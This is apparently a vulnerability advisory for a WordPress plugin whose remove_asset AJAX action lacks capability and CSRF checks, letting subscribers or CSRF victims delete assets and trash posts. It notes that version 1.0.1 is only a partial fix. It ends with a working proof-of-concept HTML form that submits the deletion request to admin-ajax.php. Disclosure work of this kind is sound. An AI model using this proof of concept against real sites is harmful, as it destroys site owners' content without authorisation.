The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low privilege users such as subscriber could delete arbitrary assets, as well as put arbitrary posts in the trash. v1.0.1 added a check to ensure post to be removed is an asset. However the plugin is still missing capability and CSRF checks
As a subscriber, or via CSRF against any authenticated user
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="remove_asset" />
<input type="hidden" name="id" value="289" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>